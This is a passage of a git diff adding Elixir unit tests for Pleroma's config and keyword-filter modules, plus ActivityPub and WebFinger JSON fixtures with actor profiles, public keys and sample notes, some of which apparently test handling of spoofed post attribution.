diff options
Diffstat (limited to 'test')
63 files changed, 3351 insertions, 214 deletions
diff --git a/test/config_test.exs b/test/config_test.exs new file mode 100644 index 000000000..837cbb30c --- /dev/null +++ b/test/config_test.exs @@ -0,0 +1,71 @@ +defmodule Pleroma.ConfigTest do + use ExUnit.Case + + test "get/1 with an atom" do + assert Pleroma.Config.get(:instance) == Application.get_env(:pleroma, :instance) + assert Pleroma.Config.get(:azertyuiop) == nil + assert Pleroma.Config.get(:azertyuiop, true) == true + end + + test "get/1 with a list of keys" do + assert Pleroma.Config.get([:instance, :public]) == + Keyword.get(Application.get_env(:pleroma, :instance), :public) + + assert Pleroma.Config.get([Pleroma.Web.Endpoint, :render_errors, :view]) == + get_in( + Application.get_env( + :pleroma, + Pleroma.Web.Endpoint + ), + [:render_errors, :view] + ) + + assert Pleroma.Config.get([:azerty, :uiop]) == nil + assert Pleroma.Config.get([:azerty, :uiop], true) == true + end + + test "get!/1" do + assert Pleroma.Config.get!(:instance) == Application.get_env(:pleroma, :instance) + + assert Pleroma.Config.get!([:instance, :public]) == + Keyword.get(Application.get_env(:pleroma, :instance), :public) + + assert_raise(Pleroma.Config.Error, fn -> + Pleroma.Config.get!(:azertyuiop) + end) + + assert_raise(Pleroma.Config.Error, fn -> + Pleroma.Config.get!([:azerty, :uiop]) + end) + end + + test "put/2 with a key" do + Pleroma.Config.put(:config_test, true) + + assert Pleroma.Config.get(:config_test) == true + end + + test "put/2 with a list of keys" do + Pleroma.Config.put([:instance, :config_test], true) + Pleroma.Config.put([:instance, :config_nested_test], []) + Pleroma.Config.put([:instance, :config_nested_test, :x], true) + + assert Pleroma.Config.get([:instance, :config_test]) == true + assert Pleroma.Config.get([:instance, :config_nested_test, :x]) == true + end + + test "delete/1 with a key" do + Pleroma.Config.put([:delete_me], :delete_me) + Pleroma.Config.delete([:delete_me]) + assert Pleroma.Config.get([:delete_me]) == nil + end + + test "delete/2 with a list of keys" do + Pleroma.Config.put([:delete_me], hello: "world", world: "Hello") + Pleroma.Config.delete([:delete_me, :world]) + assert Pleroma.Config.get([:delete_me]) == [hello: "world"] + Pleroma.Config.put([:delete_me, :delete_me], hello: "world", world: "Hello") + Pleroma.Config.delete([:delete_me, :delete_me, :world]) + assert Pleroma.Config.get([:delete_me, :delete_me]) == [hello: "world"] + end +end diff --git a/test/filter_test.exs b/test/filter_test.exs new file mode 100644 index 000000000..509c15317 --- /dev/null +++ b/test/filter_test.exs @@ -0,0 +1,154 @@ +defmodule Pleroma.FilterTest do + alias Pleroma.{User, Repo} + use Pleroma.DataCase + + import Pleroma.Factory + import Ecto.Query + + describe "creating filters" do + test "creating one filter" do + user = insert(:user) + + query = %Pleroma.Filter{ + user_id: user.id, + filter_id: 42, + phrase: "knights", + context: ["home"] + } + + {:ok, %Pleroma.Filter{} = filter} = Pleroma.Filter.create(query) + result = Pleroma.Filter.get(filter.filter_id, user) + assert query.phrase == result.phrase + end + + test "creating one filter without a pre-defined filter_id" do + user = insert(:user) + + query = %Pleroma.Filter{ + user_id: user.id, + phrase: "knights", + context: ["home"] + } + + {:ok, %Pleroma.Filter{} = filter} = Pleroma.Filter.create(query) + # Should start at 1 + assert filter.filter_id == 1 + end + + test "creating additional filters uses previous highest filter_id + 1" do + user = insert(:user) + + query_one = %Pleroma.Filter{ + user_id: user.id, + filter_id: 42, + phrase: "knights", + context: ["home"] + } + + {:ok, %Pleroma.Filter{} = filter_one} = Pleroma.Filter.create(query_one) + + query_two = %Pleroma.Filter{ + user_id: user.id, + # No filter_id + phrase: "who", + context: ["home"] + } + + {:ok, %Pleroma.Filter{} = filter_two} = Pleroma.Filter.create(query_two) + assert filter_two.filter_id == filter_one.filter_id + 1 + end + + test "filter_id is unique per user" do + user_one = insert(:user) + user_two = insert(:user) + + query_one = %Pleroma.Filter{ + user_id: user_one.id, + phrase: "knights", + context: ["home"] + } + + {:ok, %Pleroma.Filter{} = filter_one} = Pleroma.Filter.create(query_one) + + query_two = %Pleroma.Filter{ + user_id: user_two.id, + phrase: "who", + context: ["home"] + } + + {:ok, %Pleroma.Filter{} = filter_two} = Pleroma.Filter.create(query_two) + + assert filter_one.filter_id == 1 + assert filter_two.filter_id == 1 + + result_one = Pleroma.Filter.get(filter_one.filter_id, user_one) + assert result_one.phrase == filter_one.phrase + + result_two = Pleroma.Filter.get(filter_two.filter_id, user_two) + assert result_two.phrase == filter_two.phrase + end + end + + test "deleting a filter" do + user = insert(:user) + + query = %Pleroma.Filter{ + user_id: user.id, + filter_id: 0, + phrase: "knights", + context: ["home"] + } + + {:ok, filter} = Pleroma.Filter.create(query) + {:ok, filter} = Pleroma.Filter.delete(query) + assert is_nil(Repo.get(Pleroma.Filter, filter.filter_id)) + end + + test "getting all filters by an user" do + user = insert(:user) + + query_one = %Pleroma.Filter{ + user_id: user.id, + filter_id: 1, + phrase: "knights", + context: ["home"] + } + + query_two = %Pleroma.Filter{ + user_id: user.id, + filter_id: 2, + phrase: "who", + context: ["home"] + } + + {:ok, filter_one} = Pleroma.Filter.create(query_one) + {:ok, filter_two} = Pleroma.Filter.create(query_two) + filters = Pleroma.Filter.get_filters(user) + assert filter_one in filters + assert filter_two in filters + end + + test "updating a filter" do + user = insert(:user) + + query_one = %Pleroma.Filter{ + user_id: user.id, + filter_id: 1, + phrase: "knights", + context: ["home"] + } + + query_two = %Pleroma.Filter{ + user_id: user.id, + filter_id: 1, + phrase: "who", + context: ["home", "timeline"] + } + + {:ok, filter_one} = Pleroma.Filter.create(query_one) + {:ok, filter_two} = Pleroma.Filter.update(query_two) + assert filter_one != filter_two + assert filter_two.phrase == query_two.phrase + assert filter_two.context == query_two.context + end +end diff --git a/test/fixtures/httpoison_mock/http___mastodon.example.org_users_admin_status_1234.json b/test/fixtures/httpoison_mock/http___mastodon.example.org_users_admin_status_1234.json new file mode 100644 index 000000000..5c7c9c6d3 --- /dev/null +++ b/test/fixtures/httpoison_mock/http___mastodon.example.org_users_admin_status_1234.json @@ -0,0 +1,55 @@ +{ + "@context": [ + "https://www.w3.org/ns/activitystreams", + "https://w3id.org/security/v1", + { + "manuallyApprovesFollowers": "as:manuallyApprovesFollowers", + "sensitive": "as:sensitive", + "movedTo": { + "@id": "as:movedTo", + "@type": "@id" + }, + "Hashtag": "as:Hashtag", + "ostatus": "http://ostatus.org#", + "atomUri": "ostatus:atomUri", + "inReplyToAtomUri": "ostatus:inReplyToAtomUri", + "conversation": "ostatus:conversation", + "toot": "http://joinmastodon.org/ns#", + "Emoji": "toot:Emoji", + "focalPoint": { + "@container": "@list", + "@id": "toot:focalPoint" + }, + "featured": { + "@id": "toot:featured", + "@type": "@id" + }, + "schema": "http://schema.org#", + "PropertyValue": "schema:PropertyValue", + "value": "schema:value" + } + ], + "id": "http://mastodon.example.org/users/admin/statuses/100787282858396771", + "type": "Note", + "summary": null, + "inReplyTo": null, + "published": "2018-09-25T16:11:29Z", + "url": "https://mastodon.example.org/@admin/100787282858396771", + "attributedTo": "http://mastodon.example.org/users/admin", + "to": [ + "https://www.w3.org/ns/activitystreams#Public" + ], + "cc": [ + "http://mastodon.example.org/users/admin/followers" + ], + "sensitive": false, + "atomUri": "http://mastodon.example.org/users/admin/statuses/100787282858396771", + "inReplyToAtomUri": null, + "conversation": "tag:mastodon.social,2018-09-25:objectId=55659382:objectType=Conversation", + "content": "<p>the name's jond (jeans bond)</p>", + "contentMap": { + "en": "<p>the name's jond (jeans bond)</p>" + }, + "attachment": [], + "tag": [] +} diff --git a/test/fixtures/httpoison_mock/https___info.pleroma.site_actor.json b/test/fixtures/httpoison_mock/https___info.pleroma.site_actor.json new file mode 100644 index 000000000..9dabf0e52 --- /dev/null +++ b/test/fixtures/httpoison_mock/https___info.pleroma.site_actor.json @@ -0,0 +1,17 @@ +{ + "@context": "https://www.w3.org/ns/activitystreams", + "id": "https://info.pleroma.site/actor.json", + "type": "Person", + "following": "https://info.pleroma.site/following.json", + "followers": "https://info.pleroma.site/followers.json", + "inbox": "https://info.pleroma.site/inbox.json", + "outbox": "https://info.pleroma.site/outbox.json", + "preferredUsername": "admin", + "name": null, + "summary": "<p></p>", + "publicKey": { + "id": "https://info.pleroma.site/actor.json#main-key", + "owner": "https://info.pleroma.site/actor.json", + "publicKeyPem": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtc4Tir+3ADhSNF6VKrtW\nOU32T01w7V0yshmQei38YyiVwVvFu8XOP6ACchkdxbJ+C9mZud8qWaRJKVbFTMUG\nNX4+6Q+FobyuKrwN7CEwhDALZtaN2IPbaPd6uG1B7QhWorrY+yFa8f2TBM3BxnUy\nI4T+bMIZIEYG7KtljCBoQXuTQmGtuffO0UwJksidg2ffCF5Q+K//JfQagJ3UzrR+\nZXbKMJdAw4bCVJYs4Z5EhHYBwQWiXCyMGTd7BGlmMkY6Av7ZqHKC/owp3/0EWDNz\nNqF09Wcpr3y3e8nA10X40MJqp/wR+1xtxp+YGbq/Cj5hZGBG7etFOmIpVBrDOhry\nBwIDAQAB\n-----END PUBLIC KEY-----\n" + } +} diff --git a/test/fixtures/httpoison_mock/https___osada.macgirvin.com_channel_mike.json b/test/fixtures/httpoison_mock/https___osada.macgirvin.com_channel_mike.json new file mode 100644 index 000000000..c42f3a53c --- /dev/null +++ b/test/fixtures/httpoison_mock/https___osada.macgirvin.com_channel_mike.json @@ -0,0 +1,54 @@ +{ + "@context": [ + "https://www.w3.org/ns/activitystreams", + "https://w3id.org/security/v1" + ], + "type": "Person", + "id": "https://osada.macgirvin.com/channel/mike", + "preferredUsername": "mike", + "name": "Mike Macgirvin (Osada)", + "updated": "2018-08-29T03:09:11Z", + "icon": { + "type": "Image", + "mediaType": "image/jpeg", + "updated": "2018-08-29T03:10:13Z", + "url": "https://osada.macgirvin.com/photo/profile/l/2", + "height": 300, + "width": 300 + }, + "url": [ + { + "type": "Link", + "mediaType": "text/html", + "href": "https://osada.macgirvin.com/channel/mike" + }, + { + "type": "Link", + "mediaType": "text/x-zot+json", + "href": "https://osada.macgirvin.com/channel/mike" + } + ], + "inbox": "https://osada.macgirvin.com/inbox/mike", + "outbox": "https://osada.macgirvin.com/outbox/mike", + "followers": "https://osada.macgirvin.com/followers/mike", + "following": "https://osada.macgirvin.com/following/mike", + "endpoints": { + "sharedInbox": "https://osada.macgirvin.com/inbox" + }, + "publicKey": { + "id": "https://osada.macgirvin.com/channel/mike/public_key_pem", + "owner": "https://osada.macgirvin.com/channel/mike", + "publicKeyPem": "-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAskSyK2VwBNKbzZl9XNJk\nvxU5AAilmRArMmmKSzphdHaVBHakeafUfixvqNrQ/oX2srJvJKcghNmEMrJ6MJ7r\npeEndVOo7pcP4PwVjtnC06p3J711q5tBehqM25BfCLCrB2YqWF6c8zk3CPN3Na21\n8k5s4cO95N/rGN+Po0XFAX/HjKjlpgNpKRDrpxmXxTU8NZfAqeQGJ5oiMBZI9vVB\n+eU7t1L6F5/XWuUCeP4OMrG8oZX822AREba8rknS6DpkWGES0Rx2eNOyYTf6ue75\nI6Ek6rlO+da5wMWr+3BvYMq4JMIwTHzAO+ZqqJPFpzKSiVuAWb2DOX/MDFecVWJE\ntF/R60lONxe4e/00MPCoDdqkLKdwROsk1yGL7z4Zk6jOWFEhIcWy/d2Ya5CpPvS3\nu4wNN4jkYAjra+8TiloRELhV4gpcEk8nkyNwLXOhYm7zQ5sIc5rfXoIrFzALB86W\nG05Nnqg+77zZIaTZpD9qekYlaEt+0OVtt9TTIeTiudQ983l6mfKwZYymrzymH1dL\nVgxBRYo+Z53QOSLiSKELfTBZxEoP1pBw6RiOHXydmJ/39hGgc2YAY/5ADwW2F2yb\nJ7+gxG6bPJ3ikDLYcD4CB5iJQdnTcDsFt3jyHAT6wOCzFAYPbHUqtzHfUM30dZBn\nnJhQF8udPLcXLaj6GW75JacCAwEAAQ==\n-----END PUBLIC KEY-----\n" + }, + "signature": { + "@context": [ + "https://www.w3.org/ns/activitystreams", + "https://w3id.org/security/v1" + ], + "type": "RsaSignature2017", + "nonce": "bd60167a764a936788d9538531284dfacc258daae0297bc34a83bce136dedb5d", + "creator": "https://osada.macgirvin.com/channel/mike/public_key_pem", + "created": "2018-10-17T07:16:28Z", + "signatureValue": "WbfFVIPImkd3yNu6brz0CvZaeV242rwAbH0vy8DM4vfnXCxLr5Uv/Wj9gwP+tbooTxGaahAKBeqlGkQp8RLEo37LATrKMRLA/0V6DeeV+C5ORWR9B4WxyWiD3s/9Wf+KesFMtktNLAcMZ5PfnOS/xNYerhnpkp/gWPxtkglmLIWJv+w18A5zZ01JCxsO4QljHbhYaEUPHUfQ97abrkLECeam+FThVwdO6BFCtbjoNXHfzjpSZL/oKyBpi5/fpnqMqOLOQPs5WgBBZJvjEYYkQcoPTyxYI5NGpNbzIjGHPQNuACnOelH16A7L+q4swLWDIaEFeXQ2/5bmqVKZDZZ6usNP4QyTVszwd8jqo27qcDTNibXDUTsTdKpNQvM/3UncBuzuzmUV3FczhtGshIU1/pRVZiQycpVqPlGLvXhP/yZCe+1siyqDd+3uMaS2vkHTObSl5r+VYof+c+TcjrZXHSWnQTg8/X3zkoBWosrQ93VZcwjzMxQoARYv6rphbOoTz7RPmGAXYUt3/PDWkqDlmQDwCpLNNkJo1EidyefZBdD9HXQpCBO0ZU0NHb0JmPvg/+zU0krxlv70bm3RHA/maBETVjroIWzt7EwQEg5pL2hVnvSBG+1wF3BtRVe77etkPOHxLnYYIcAMLlVKCcgDd89DPIziQyruvkx1busHI08=" + } +} diff --git a/test/fixtures/httpoison_mock/https___prismo.news__mxb.json b/test/fixtures/httpoison_mock/https___prismo.news__mxb.json new file mode 100644 index 000000000..a2fe53117 --- /dev/null +++ b/test/fixtures/httpoison_mock/https___prismo.news__mxb.json @@ -0,0 +1 @@ +{"id":"https://prismo.news/@mxb","type":"Person","name":"mxb","preferredUsername":"mxb","summary":"Creator of △ Prismo\r\n\r\nFollow me at @mb@mstdn.io","inbox":"https://prismo.news/ap/accounts/mxb/inbox","outbox":"https://prismo.news/ap/accounts/mxb/outbox","url":"https://prismo.news/@mxb","publicKey":{"id":"https://prismo.news/@mxb#main-key","owner":"https://prismo.news/@mxb","publicKeyPem":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA41gqLkBYuPLurC2TarF8\nbdyvqP54XzKyScJ6iPNkk4D4plYdWUVj0aOIHQ8LVfBeziH83jDMpRegm1sRLpNG\n1Ti+SzlWyTwugJ8wfQvwJL7iEzqhuPFddjPLpv0djMptvm5vtG6u6O3g4RpX12bv\n4pYRoMStPSv9KRKD/8Naw5Nv85PIWRc9rOly/EoVZBnbesroo69caiGthgChE2pa\niisQ5CEgj/615WUlUATkz3VdExKQkQOdeVABheIvcS5OsMurXnpWyLQ4n9WalNvF\nlJc08aOTIo4plsLAvdcGRDsBzio4qPok3jgzPpFkDqe+02WG/QMPT9VrzKO49N5R\nqQIDAQAB\n-----END PUBLIC KEY-----\n"},"icon":{"type":"Image","url":"https://prismo.s3.wasabisys.com/account/1/avatar/size_400-b6e570850878684362ba3b4bd9ceb007.jpg","media_type":null},"@context":["https://www.w3.org/ns/activitystreams","https://w3id.org/security/v1",{"Hashtag":"as:Hashtag"},{"votes":{"@id":"as:votes","@type":"@id"}}]}
\ No newline at end of file diff --git a/test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json new file mode 100644 index 000000000..a0dc4c830 --- /dev/null +++ b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json @@ -0,0 +1,14 @@ +{ + "@context": "https://www.w3.org/ns/activitystreams", + "actor": "http://mastodon.example.org/users/admin", + "attachment": [], + "attributedTo": "http://mastodon.example.org/users/admin", + "content": "<p>this post was not actually written by Haelwenn</p>", + "id": "https://info.pleroma.site/activity.json", + "published": "2018-09-01T22:15:00Z", + "tag": [], + "to": [ + "https://www.w3.org/ns/activitystreams#Public" + ], + "type": "Note" +} diff --git a/test/fixtures/httpoison_mock/https__info.pleroma.site_activity2.json b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity2.json new file mode 100644 index 000000000..b16a9279b --- /dev/null +++ b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity2.json @@ -0,0 +1,14 @@ +{ + "@context": "https://www.w3.org/ns/activitystreams", + "attributedTo": "https://info.pleroma.site/actor.json", + "attachment": [], + "actor": "http://mastodon.example.org/users/admin", + "content": "<p>this post was not actually written by Haelwenn</p>", + "id": "https://info.pleroma.site/activity2.json", + "published": "2018-09-01T22:15:00Z", + "tag": [], + "to": [ + "https://www.w3.org/ns/activitystreams#Public" + ], + "type": "Note" +} diff --git a/test/fixtures/httpoison_mock/https__info.pleroma.site_activity3.json b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity3.json new file mode 100644 index 000000000..1df73f2c5 --- /dev/null +++ b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity3.json @@ -0,0 +1,13 @@ +{ + "@context": "https://www.w3.org/ns/activitystreams", + "attributedTo": "http://mastodon.example.org/users/admin", + "attachment": [], + "content": "<p>this post was not actually written by Haelwenn</p>", + "id": "https://info.pleroma.site/activity2.json", + "published": "2018-09-01T22:15:00Z", + "tag": [], + "to": [ + "https://www.w3.org/ns/activitystreams#Public" + ], + "type": "Note" +} diff --git a/test/fixtures/httpoison_mock/https__info.pleroma.site_activity4.json b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity4.json new file mode 100644 index 000000000..57a73b12a --- /dev/null +++ b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity4.json @@ -0,0 +1,13 @@ +{ + "@context": "https://www.w3.org/ns/activitystreams", + "attributedTo": "http://mastodon.example.org/users/admin", + "attachment": [], + "content": "<p>this post was not actually written by Haelwenn</p>", + "id": "http://mastodon.example.org/users/admin/activities/1234", + "published": "2018-09-01T22:15:00Z", + "tag": [], + "to": [ + "https://www.w3.org/ns/activitystreams#Public" + ], + "type": "Note" +} diff --git a/test/fixtures/httpoison_mock/mike@osada.macgirvin.com.json b/test/fixtures/httpoison_mock/mike@osada.macgirvin.com.json new file mode 100644 index 000000000..fe6b83ca6 --- /dev/null +++ b/test/fixtures/httpoison_mock/mike@osada.macgirvin.com.json @@ -0,0 +1,53 @@ +{ + "subject": "acct:mike@osada.macgirvin.com", + "aliases": [ + "https://osada.macgirvin.com/channel/mike", + "https://osada.macgirvin.com/~mike", + "https://osada.macgirvin.com/@mike" + ], + "properties": { + "http://webfinger.net/ns/name": "Mike Macgirvin (Osada)", + "http://xmlns.com/foaf/0.1/name": "Mike Macgirvin (Osada)", + "https://w3id.org/security/v1#publicKeyPem": "-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAskSyK2VwBNKbzZl9XNJk\nvxU5AAilmRArMmmKSzphdHaVBHakeafUfixvqNrQ/oX2srJvJKcghNmEMrJ6MJ7r\npeEndVOo7pcP4PwVjtnC06p3J711q5tBehqM25BfCLCrB2YqWF6c8zk3CPN3Na21\n8k5s4cO95N/rGN+Po0XFAX/HjKjlpgNpKRDrpxmXxTU8NZfAqeQGJ5oiMBZI9vVB\n+eU7t1L6F5/XWuUCeP4OMrG8oZX822AREba8rknS6DpkWGES0Rx2eNOyYTf6ue75\nI6Ek6rlO+da5wMWr+3BvYMq4JMIwTHzAO+ZqqJPFpzKSiVuAWb2DOX/MDFecVWJE\ntF/R60lONxe4e/00MPCoDdqkLKdwROsk1yGL7z4Zk6jOWFEhIcWy/d2Ya5CpPvS3\nu4wNN4jkYAjra+8TiloRELhV4gpcEk8nkyNwLXOhYm7zQ5sIc5rfXoIrFzALB86W\nG05Nnqg+77zZIaTZpD9qekYlaEt+0OVtt9TTIeTiudQ983l6mfKwZYymrzymH1dL\nVgxBRYo+Z53QOSLiSKELfTBZxEoP1pBw6RiOHXydmJ/39hGgc2YAY/5ADwW2F2yb\nJ7+gxG6bPJ3ikDLYcD4CB5iJQdnTcDsFt3jyHAT6wOCzFAYPbHUqtzHfUM30dZBn\nnJhQF8udPLcXLaj6GW75JacCAwEAAQ==\n-----END PUBLIC KEY-----\n", + "http://purl.org/zot/federation": "zot6,activitypub" + }, + "links": [ + { + "rel": "http://webfinger.net/rel/avatar", + "type": "image/jpeg", + "href": "https://osada.macgirvin.com/photo/profile/l/2" + }, + { + "rel": "http://webfinger.net/rel/blog", + "href": "https://osada.macgirvin.com/channel/mike" + }, + { + "rel": "http://openid.net/specs/connect/1.0/issuer", + "href": "https://osada.macgirvin.com" + }, + { + "rel": "http://purl.org/zot/protocol/6.0", + "type": "application/x-zot+json", + "href": "https://osada.macgirvin.com/channel/mike" + }, + { + "rel": "http://purl.org/openwebauth/v1", + "type": "application/x-zot+json", + "href": "https://osada.macgirvin.com/owa" + }, + { + "rel": "http://ostatus.org/schema/1.0/subscribe", + "template": "https://osada.macgirvin.com/follow?url={uri}" + }, + { + "rel": "self", + "type": "application/ld+json; profile=\"https://www.w3.org/ns/activitystreams\"", + "href": "https://osada.macgirvin.com/channel/mike" + }, + { + "rel": "self", + "type": "application/activity+json", + "href": "https://osada.macgirvin.com/channel/mike" + } + ] +} diff --git a/test/fixtures/kroeg-announce-with-inline-actor.json b/test/fixtures/kroeg-announce-with-inline-actor.json new file mode 100644 index 000000000..7bd6e8199 --- /dev/null +++ b/test/fixtures/kroeg-announce-with-inline-actor.json @@ -0,0 +1 @@ +{"@context":["https://www.w3.org/ns/activitystreams","https://puckipedia.com/-/context"],"actor":{"endpoints":"https://puckipedia.com/#endpoints","followers":"https://puckipedia.com/followers","following":"https://puckipedia.com/following","icon":{"mediaType":"image/png","type":"Image","url":"https://puckipedia.com/images/avatar.png"},"id":"https://puckipedia.com/","inbox":"https://puckipedia.com/inbox","kroeg:blocks":{"id":"https://puckipedia.com/blocks"},"liked":"https://puckipedia.com/liked","manuallyApprovesFollowers":false,"name":"HACKER TEEN PUCKIPEDIA 👩💻","outbox":"https://puckipedia.com/outbox","preferredUsername":"puckipedia","publicKey":{"id":"https://puckipedia.com/#key","owner":"https://puckipedia.com/","publicKeyPem":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvN05xIcFE0Qgany7Rht4\n0ZI5wu++IT7K5iSqRimBYkpoeHbVcT9RFlW+aWH/QJJW/YgZ7+LMr8AMCrKrwSpS\nCndyrpx4O4lZ3FNRLu7tbklh01rGZfE6R1SFfYBpvMvImc9nYT6iezYDbv6NkHku\no3aVhjql216XlA0OhIrqQme9sAdrLbjbMrTUS8douCTkDOX+JFj1ghHCqdYEMZJI\nOY9kovtgnqyxFLm0RsPGsO1+g/OVojqG+VqHz6O2lceaTVQLlnZ4gOhLVG1tVsA2\nRfXQK+R/VgXncYE+BlQVd/tcdGAz7CDL7PP3rP65gmARnafhGR96cCOi/KzlAXSO\nMwIDAQAB\n-----END PUBLIC KEY-----","type":[]},"summary":"<p>federated hacker teen<br/>\n[<a href=\"https://pronoun.is/she\">she</a>/<a href=\"https://pronoun.is/they\">they</a>]</p>","type":"Person","updated":"2017-12-19T16:56:29.7576707+00:00"},"cc":"http://mastodon.example.org/users/admin","id":"https://puckipedia.com/cc56a9658e","object":{"as:sensitive":false,"attributedTo":{"endpoints":{"sharedInbox":"https://mastodon.social/inbox","type":[]},"followers":"http://mastodon.example.org/users/admin/followers","following":"http://mastodon.example.org/users/admin/following","icon":{"mediaType":"image/png","type":"Image","url":"https://files.mastodon.social/accounts/avatars/000/015/163/original/70ca6c52b01ca913.png"},"id":"http://mastodon.example.org/users/admin","inbox":"http://mastodon.example.org/users/admin/inbox","manuallyApprovesFollowers":{"@value":"False","type":"xsd:boolean"},"name":"","outbox":"http://mastodon.example.org/users/admin/outbox","preferredUsername":"revenant","publicKey":{"id":"http://mastodon.example.org/users/admin#main-key","owner":"http://mastodon.example.org/users/admin","publicKeyPem":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0gEN3wPW7gkE2gQqnmfB\n1ychjmFIf2LIwY0oCJLiGE/xpZrUKoq+eWH30AP7mATw4LD0gOYABL/ijqPUrPqR\nDXLL+0CqMP8HsZKvRlj9KArMK3YtNiSGGj2U7iReiRrD7nJzjJlsjjJXflLZhZ7/\nenSv1CcaeK8tB0PoAgShy/MyfhPF7WI5/Zm9DmmDQFvUEnDYKXAf/vG/IWw1EyMC\nkbaEYJeIowQU3GsbPxzRGI22bQtfotm431Ch2MbNo+kyzmYVFLAVoSGNMzvJwOPg\nTxLIIBeQXG7MinRyK887yPKhxhcALea4yCcALaa+3jPE7yqwIKYwTHtSlblsHDAo\nmQIDAQAB\n-----END PUBLIC KEY-----\n","type":[]},"summary":"<p>neatly partitioned meats and cheeses appeal to me on an aesthetic level | any pronouns | revenant1.net</p>","type":"Person","url":"https://mastodon.social/@revenant"},"cc":"http://mastodon.example.org/users/admin/followers","content":"<p>the name's jond (jeans bond)</p>","contentMap":{"en":"<p>the name's jond (jeans bond)</p>"},"conversation":"tag:mastodon.social,2018-09-25:objectId=55659382:objectType=Conversation","id":"http://mastodon.example.org/users/admin/statuses/100787282858396771","ostatus:atomUri":"http://mastodon.example.org/users/admin/statuses/100787282858396771","published":"2018-09-25T16:11:29Z","to":"https://www.w3.org/ns/activitystreams#Public","type":"Note","url":"https://mastodon.social/@revenant/100787282858396771"},"to":["https://www.w3.org/ns/activitystreams#Public","https://puckipedia.com/followers"],"type":"Announce"} diff --git a/test/fixtures/kroeg-array-less-emoji.json b/test/fixtures/kroeg-array-less-emoji.json new file mode 100644 index 000000000..3d7025f55 --- /dev/null +++ b/test/fixtures/kroeg-array-less-emoji.json @@ -0,0 +1 @@ +{"@context":["https://www.w3.org/ns/activitystreams","https://puckipedia.com/-/context"],"actor":{"endpoints":"https://puckipedia.com/#endpoints","followers":"https://puckipedia.com/followers","following":"https://puckipedia.com/following","icon":{"mediaType":"image/png","type":"Image","url":"https://puckipedia.com/images/avatar.png"},"id":"https://puckipedia.com/","inbox":"https://puckipedia.com/inbox","kroeg:blocks":{"id":"https://puckipedia.com/blocks"},"liked":"https://puckipedia.com/liked","manuallyApprovesFollowers":false,"name":"HACKER TEEN PUCKIPEDIA 👩💻","outbox":"https://puckipedia.com/outbox","preferredUsername":"puckipedia","publicKey":{"id":"https://puckipedia.com/#key","owner":"https://puckipedia.com/","publicKeyPem":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvN05xIcFE0Qgany7Rht4\n0ZI5wu++IT7K5iSqRimBYkpoeHbVcT9RFlW+aWH/QJJW/YgZ7+LMr8AMCrKrwSpS\nCndyrpx4O4lZ3FNRLu7tbklh01rGZfE6R1SFfYBpvMvImc9nYT6iezYDbv6NkHku\no3aVhjql216XlA0OhIrqQme9sAdrLbjbMrTUS8douCTkDOX+JFj1ghHCqdYEMZJI\nOY9kovtgnqyxFLm0RsPGsO1+g/OVojqG+VqHz6O2lceaTVQLlnZ4gOhLVG1tVsA2\nRfXQK+R/VgXncYE+BlQVd/tcdGAz7CDL7PP3rP65gmARnafhGR96cCOi/KzlAXSO\nMwIDAQAB\n-----END PUBLIC KEY-----","type":[]},"summary":"<p>federated hacker teen<br/>\n[<a href=\"https://pronoun.is/she\">she</a>/<a href=\"https://pronoun.is/they\">they</a>]</p>","type":"Person","updated":"2017-12-19T16:56:29.7576707+00:00"},"cc":"https://puckipedia.com/followers","id":"https://puckipedia.com/1jjx-ob5r","object":{"attributedTo":"https://puckipedia.com/","cc":"https://puckipedia.com/followers","content":"<p>spinning up an extra process that just handles the delivery queue to see what happens. The concept of this working is kind of amusing :icon_e_smile: </p><p>I should probably add back some code to synchronize state between multiple processes; and add back the pubsub mechanism so live streams of collections can return! Also I should add database transactions back.</p>","conversation":"https://puckipedia.com/f/conversation/4eae6d6c-d046-4737-9c17-c7a791c7ad77","id":"https://puckipedia.com/1jjx-ob5r/note","likes":"https://puckipedia.com/1jjx-ob5r/note/likes","name":"Kroeg dev thread","published":"2018-09-25T22:35:59.770Z","replies":"https://puckipedia.com/1jjx-ob5r/note/replies","shares":"https://puckipedia.com/1jjx-ob5r/note/shares","tag":{"icon":{"mediaType":"image/png","type":"Image","url":"https://puckipedia.com/forum/images/smilies/icon_e_smile.png"},"id":"https://puckipedia.com/forum/images/smilies/icon_e_smile","name":":icon_e_smile:","type":"Emoji","updated":"2018-09-16T11:11:11.111Z"},"to":"https://www.w3.org/ns/activitystreams#Public","type":"Note"},"published":"2018-09-25T22:35:59.770Z","to":"https://www.w3.org/ns/activitystreams#Public","type":"Create"}
\ No newline at end of file diff --git a/test/fixtures/kroeg-array-less-hashtag.json b/test/fixtures/kroeg-array-less-hashtag.json new file mode 100644 index 000000000..28a01904c --- /dev/null +++ b/test/fixtures/kroeg-array-less-hashtag.json @@ -0,0 +1 @@ 